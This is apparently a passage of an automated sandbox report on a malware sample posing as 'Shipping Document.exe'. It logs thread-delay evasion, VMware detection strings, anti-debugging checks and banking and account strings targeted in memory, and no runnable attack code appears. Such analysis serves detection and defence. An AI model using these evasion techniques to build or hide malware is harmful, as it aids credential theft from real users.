                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: 1150000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: 2B90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: 4B90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: 52A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: 62A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: 63D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: 73D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: B770000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: C770000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Memory allocated: CC00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_0114096E rdtsc
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 240000
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 239852
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 239735
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 239622
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 239516
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 239391
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 239274
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 239172
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 239053
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 238938
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 238813
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 238688
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 238547
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 238407
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 238235
                Source: C:\Users\user\Desktop\Shipping Document.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 240000
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 239657
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 239485
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 239340
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 239214
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 239079
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 238969
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 238813
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 238672
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 238542
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 238391
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 238260
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 238156
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 237474
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 237325
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 237213
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 237093
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 236922
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Shipping Document.exe | Window / User API: threadDelayed 1343
                Source: C:\Users\user\Desktop\Shipping Document.exe | Window / User API: threadDelayed 718
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3802
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5123
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Window / User API: threadDelayed 1419
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Window / User API: threadDelayed 1082
                Source: C:\Windows\SysWOW64\xcopy.exe | Window / User API: threadDelayed 870
                Source: C:\Windows\SysWOW64\xcopy.exe | Window / User API: threadDelayed 9104
                Source: C:\Users\user\Desktop\Shipping Document.exe | API coverage: 0.7 %
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | API coverage: 0.2 %
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -10145709240540247s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -239852s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -239735s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -239622s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -239516s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -239391s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -239274s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -239172s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -239053s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -238938s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -238813s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -238688s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -238547s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -238407s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 2664 | Thread sleep time: -238235s >= -30000s
                Source: C:\Users\user\Desktop\Shipping Document.exe TID: 4816 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1264 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1204 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2376 | Thread sleep count: 5123 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1456 | Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6124 | Thread sleep count: 308 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4348 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -11068046444225724s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -239657s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -239485s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -239340s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -239214s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -239079s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -238969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -238813s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -238672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -238542s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -238391s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -238260s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -238156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -237474s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -237325s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -237213s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -237093s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 6932 | Thread sleep time: -236922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe TID: 7068 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe TID: 7596 | Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe TID: 7596 | Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7520 | Thread sleep count: 870 > 30
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7520 | Thread sleep time: -1740000s >= -30000s
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7520 | Thread sleep count: 9104 > 30
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7520 | Thread sleep time: -18208000s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exe | Last function: Thread delayed
                Source: 354xH8-mR.22.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 354xH8-mR.22.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 354xH8-mR.22.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 354xH8-mR.22.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: KOENBvWt.exe, 0000000C.00000002.1390429470.000000000834A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 354xH8-mR.22.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 354xH8-mR.22.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: 354xH8-mR.22.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 354xH8-mR.22.dr | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: 354xH8-mR.22.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 354xH8-mR.22.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 354xH8-mR.22.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 354xH8-mR.22.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 354xH8-mR.22.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 354xH8-mR.22.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 354xH8-mR.22.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 354xH8-mR.22.dr | Binary or memory string: discord.comVMware20,11696492231f
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3691603139.0000000000F89000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.1733419744.000001DB1F05D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 354xH8-mR.22.dr | Binary or memory string: global block list test formVMware20,11696492231
                Source: Shipping Document.exe, 00000000.00000002.1267858070.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 354xH8-mR.22.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: 354xH8-mR.22.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 354xH8-mR.22.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 354xH8-mR.22.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 354xH8-mR.22.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 354xH8-mR.22.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: xcopy.exe, 00000016.00000002.3688129480.0000000003524000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu"W
                Source: 354xH8-mR.22.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 354xH8-mR.22.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 354xH8-mR.22.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 354xH8-mR.22.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 354xH8-mR.22.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 354xH8-mR.22.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 354xH8-mR.22.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 354xH8-mR.22.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 0_2_00B51AD0 CheckRemoteDebuggerPresent
                Source: C:\Users\user\Desktop\Shipping Document.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\Shipping Document.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\Shipping Document.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\xcopy.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_0114096E rdtsc
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00417953 LdrLoadDll
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011C0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011AE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01130124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01198158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01106154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01106154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_010FC156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01194144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01194144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01194144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01194144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01194144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011D4164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011D4164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_0118019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_0118019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_0118019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_0118019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_01140185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011BC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011BC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_010FA197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_010FA197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_010FA197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011A4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_011A4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_0117E1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E1D0 mov eax, dword ptr fs:[00000030h]10_2_0117E1D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E1D0 mov eax, dword ptr fs:[00000030h]10_2_0117E1D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C61C3 mov eax, dword ptr fs:[00000030h]10_2_011C61C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C61C3 mov eax, dword ptr fs:[00000030h]10_2_011C61C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011301F8 mov eax, dword ptr fs:[00000030h]10_2_011301F8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D61E5 mov eax, dword ptr fs:[00000030h]10_2_011D61E5
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E016 mov eax, dword ptr fs:[00000030h]10_2_0111E016
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E016 mov eax, dword ptr fs:[00000030h]10_2_0111E016
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E016 mov eax, dword ptr fs:[00000030h]10_2_0111E016
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E016 mov eax, dword ptr fs:[00000030h]10_2_0111E016
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01184000 mov ecx, dword ptr fs:[00000030h]10_2_01184000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A2000 mov eax, dword ptr fs:[00000030h]10_2_011A2000
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01196030 mov eax, dword ptr fs:[00000030h]10_2_01196030
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FA020 mov eax, dword ptr fs:[00000030h]10_2_010FA020
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FC020 mov eax, dword ptr fs:[00000030h]10_2_010FC020
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01102050 mov eax, dword ptr fs:[00000030h]10_2_01102050
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01186050 mov eax, dword ptr fs:[00000030h]10_2_01186050
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112C073 mov eax, dword ptr fs:[00000030h]10_2_0112C073
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110208A mov eax, dword ptr fs:[00000030h]10_2_0110208A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C60B8 mov eax, dword ptr fs:[00000030h]10_2_011C60B8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C60B8 mov ecx, dword ptr fs:[00000030h]10_2_011C60B8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F80A0 mov eax, dword ptr fs:[00000030h]10_2_010F80A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011980A8 mov eax, dword ptr fs:[00000030h]10_2_011980A8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011820DE mov eax, dword ptr fs:[00000030h]10_2_011820DE
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011420F0 mov ecx, dword ptr fs:[00000030h]10_2_011420F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FA0E3 mov ecx, dword ptr fs:[00000030h]10_2_010FA0E3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011860E0 mov eax, dword ptr fs:[00000030h]10_2_011860E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011080E9 mov eax, dword ptr fs:[00000030h]10_2_011080E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FC0F0 mov eax, dword ptr fs:[00000030h]10_2_010FC0F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01120310 mov ecx, dword ptr fs:[00000030h]10_2_01120310
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A30B mov eax, dword ptr fs:[00000030h]10_2_0113A30B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A30B mov eax, dword ptr fs:[00000030h]10_2_0113A30B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A30B mov eax, dword ptr fs:[00000030h]10_2_0113A30B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FC310 mov ecx, dword ptr fs:[00000030h]10_2_010FC310
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D8324 mov eax, dword ptr fs:[00000030h]10_2_011D8324
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D8324 mov ecx, dword ptr fs:[00000030h]10_2_011D8324
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D8324 mov eax, dword ptr fs:[00000030h]10_2_011D8324
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D8324 mov eax, dword ptr fs:[00000030h]10_2_011D8324
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov ecx, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A8350 mov ecx, dword ptr fs:[00000030h]10_2_011A8350
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CA352 mov eax, dword ptr fs:[00000030h]10_2_011CA352
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
